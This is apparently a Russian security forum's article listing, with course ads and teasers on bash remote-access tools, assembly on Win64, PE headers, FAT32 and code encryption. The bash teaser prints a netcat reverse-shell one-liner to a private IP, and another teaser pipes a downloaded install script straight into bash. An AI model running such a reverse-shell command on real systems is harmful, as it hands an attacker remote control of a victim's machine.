• 4 июля стартует курс «Python для Пентестера ©» от команды The Codeby

    Понятные и наглядные учебные материалы с информацией для выполнения ДЗ; Проверка ДЗ вручную – наставник поможет улучшить написанный вами код; Помощь преподавателей при выполнении заданий или в изучении теории; Групповой чат в Telegram с другими учениками, проходящими курс; Опытные разработчики – команда Codeby School, лидер по информационной безопасности в RU-сегменте

    Запись на курс до 15 июля. Подробнее ...

  • 11 июля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 20 июля. Подробнее ...

Программирование

Статья Написание программы для удалённого доступа на bash. Попытка первая.

  • 953
  • 7
Всем читающим привет, сегодня хотелось бы поговорить о вирусах на Bash. Начнём с элементарного.

Статья написана в целях ознакомления и не призывает к действию!

bin-bash.jpg


Одним из самых основных инструментов сетевого взаимодействия в Linux является netcat и с помощью него можно создать простейший вирус, буквально в одну строку.
Эта команда дарует вам шелл на хост жертвы.

Bash:
nc -nv 192.168.0.178 4444 -e /bin/bash

Но сейчас это уже не работает, т.к. вряд ли безопасно выполнять команды принятые по незащищённому соединению и это понимают все. Поэтому сейчас почти ни в одном линуксе не будет работать опция -e.

Теперь перейдём к более интересным вещам, а именно созданию более-менее полноценного реверс-шелла. Где-то с костылями, где-то со странными решениями, но для меня это скорее исследовательская работа. :)

Для начала на нашу тестовую мшину нужно установить netcat.

Bash:
sudo apt...

Статья FASM. Обработка исключений в Win-64

  • 779
  • 5
На этапе проектирования софта, как-правило предусматривают в нём модуль обработки ошибок и исключений. На жаргоне программистов его называют «защитой от дурака», хотя не исключён вариант, что дураком является здесь как-раз сам разработчик, поскольку плохо продумал пользовательский интерфейс. В любом случае «Exception Handler» должен присутствовать в коде, но с переходом на Win-64 мы сталкиваемся с проблемой. Дело в том, что основанный на стековых фреймах привычный механизм SEH больше не работает – на х64 он подвергся полной «прокачке» и требует теперь абсолютно иного подхода. В данной статье попробуем освятить достоинства и недостатки усовершенствованного механизма SEH-х64.

Оглавление:

1. Введение;
2. Проблемы отладчика WinDbg на 64-бит системах Win7;
3. Программная реализация обработки исключений;
4. Структуры...

Статья FASM. Особенности кодинга на платформе Win-64

  • 918
  • 1
64-разрядная архитектура ворвалась в нашу жизнь как торнадо, затягивая в себя всё больше инженеров и прикладных программистов. Новые термины стали появляться как грибы после дождя, а давать им толкового объяснения никто не торопился. В данной статье рассматриваются фундаментальные основы кодинга на платформах Win64, с реальными примерами в отладчике.

Оглавление:


1. Вводная часть;
2. Организация памяти в режиме “Long-mode” х64;
3. Доп.регистры GPR и префикс REX;
4. RIP-относительная адресация;
5. Соглашение “Fast-Call” – быстрый вызов функций;
6. Заключение.


1. Вводная часть

С обзором архитектур связано и без того множество нестыковок, а выход на сцену в...

Статья ASM. Демоны в Windows (1) – сессии, станции, рабочие столы

  • 2 124
  • 9
В системах класса Win, одним из привлекательных направлений является программирование сервисов. Связано это с тем, что сервисы имеют приоритет над обычными приложениями, поскольку предназначены для обслуживания работы самой ОС и запускаются от имени системы. По этой причине, их ещё называют системными службами. Если провести аналогию с Linux, то сервисы Win можно сравнить с демонами, которые присутствуют всегда, но не выползая в свет работают в фоне. В данном треде попробуем разобраться с технической их стороной и посмотрим, какую они представляют угрозу безопасности. Материал получился обширным, а потому пришлось разделить его на две части.

Оглавление:


1. Вводная часть
2. Учётные записи: System, LocalService, NetworkService
3. Сессии входа в систему
4. Оконные станции
5. Рабочие...

Статья Свое облачное хранилище

  • 1 952
  • 7
Приветствую!

Не так давно мне понадобилось свое облачное хранилище. На Кодебай я, к сожалению, решения не нашел, так что решил поделиться тем, что получилось у меня.

В этой статье речь пойдет о поднятии своего облака. По сути, все, что нам нужно - это программа, которая будет шарить файлы, и производить над ними действия из веб интерфейса.

Мой выбор остановился на простенькой софтине Filebrowser. это - опенсурсный веб сервер с удобным веб интерфейсом и необходимым набором функционала, написанный на Go.

Установка крайне простая, в консоле пишем:
curl -fsSL https://raw.githubusercontent.com/filebrowser/get/master/get.sh | bash

1642327751939.png


Эта команда стягивает командный файл и сразу выполняет его, тем самым, самостоятельно устанавливая нужный нам софт.

Вот и все. Теперь осталось только запустить и посмотреть, что же...

Статья ASM – Тёмная сторона РЕ-файла

  • 2 833
  • 14
Исполняемым файлом в системах класса Win является "Рortable-Еxecutable", или просто РЕ. Инженеры Microsoft потрудились на славу, чтобы предоставить нам спецификацию на него, однако некоторые "тузы в рукавах" они всё-таки припрятали. В данной статье рассматривается недокументированная часть РЕ-файла, ознакомившись с которой можно будет собирать информацию о процессе создания файлов компилятором. Антивирусные компании уже давно практикуют эту фишку своих сканерах, а для широкого круга общественности её так и не предали огласке.

Под катом:


1. Общие сведения;
2. Структура РЕ-файла;
3. Заголовок Rich;
4. Практика – парсим хидеры;
5. Область применения знаний;
6. Заключение.



1...

Статья ASM. FAT32 – описание файловой системы

  • 2 735
  • 3
FAT датируется аж 1977-годом и пришла к нам из проприетарного DOS. Благодаря простой реализации, сейчас это способ хранения данных на таких носителях как USB-брелки, карты-памяти телефонов и ЦФК, в EFI для хранения кода загрузчика, в системах реального времени RTOS, и многое другое. В данной статье рассматриваются гендерные признаки зоопарка FAT, и в какую сущность превратила эволюция конкретно взятую FAT32. Детальный её разбор позволит понять алгоритм восстановления удалённых файлов, а так-же подтолкнёт на создание своих утилит форматирования, с широким спектром логической геометрии. Из инструментов понадобится любой (способный работать с дисками) HEX-редактор типа WinHex или HxD, штатный калькулятор Win, и от Microsoft.

Logo.png


Оглавление:

1. Вводная...

Статья ASM – Распределение физ.памяти процессам Windows

  • 2 429
  • 5
В системной архитектуре отображение вирт.памяти на физическую носит таинственный характер. Предлагая материал на эту тему, MSDN забывает о логической нити – по большому счёту у них тонны безсвязных отрывков. В результате сеть заполонили статьи о диспетчерезации памяти, однако инфа в них сильно разнится, поскольку каждый из авторов трактует оригинальные доки по своему. Приняв это во-внимание, в данной статье был выбрал формат "беседа с новичком", чтобы рассмотреть такие вопросы как: задачи MMU и VMM, область применения списков VAD и MDL, назначение базы PFN, состав рабочих страниц WorkingSet, способы трансляции адресов, и многое другое. Из оружий ближнего боя понадобится отладчик WinDbg, и том(3) мануалов Intel , как внушающий доверие источник...

Статья ASM – Динамическое шифрование кода

  • 3 735
  • 13
В программировании принято разделять шифрование на статическое и динамическое. Первый вариант подразумевает крипт всей тушки дискового образа программы, и обратный декрипт его при загрузки в память. Он прост в практической реализации, но как и следует из алгоритма, защищает лишь двоичный образ софта на жёстком диске, а в памяти ОЗУ код уже сбрасывает с себя всю маскировку и становится полностью доступным исследователю. Остаётся тупо снять дамп памяти, и в оффлайне не торопясь разбирать защиту.

Чтобы хоть как-то этому противостоять, программисты придумали "динамическое шифрование" (Dynamic Encryption), когда прожка криптуется не вся целиком, а отдельными блоками, в качестве которых могут выступать, например, процедуры. Теперь, после загрузки образа в память, расшифровывается только исполняемый на текущий момент блок кода, а остальная часть остаётся лежать как и прежде в зашифрованном виде. Когда исполнение доходит до следующего блока он разворачивается, а...

Статья ASM – техники из старого сундука [3]

  • 2 224
  • 15
Hello All!
Делиться со-всякими алго и наработками уже входит у меня в привычку, и в продолжении цикла этих заметок предлагаю разбор всякого хлама из старого сундука. На повестке дня сегодня следующее:


1. Фиктивный стек;
2. Список установленных программ в реестре;
3. Базовые операции с текстом;
4. Заключение.
----------------------------------------------

1. Фиктивный стек

Герою восточного фольклора Ходже Насреддину приписывают выражение: -"Если гора не идёт к Магомеду, то Магомед пойдёт к горе". В этой части статьи попробуем спроецировать данное утверждение на системный стек, но для начала рассмотрим микро-архитектуру центрального процессора, и какое место занимает в ней этот стек.

На рисунке ниже представлена структурная схема...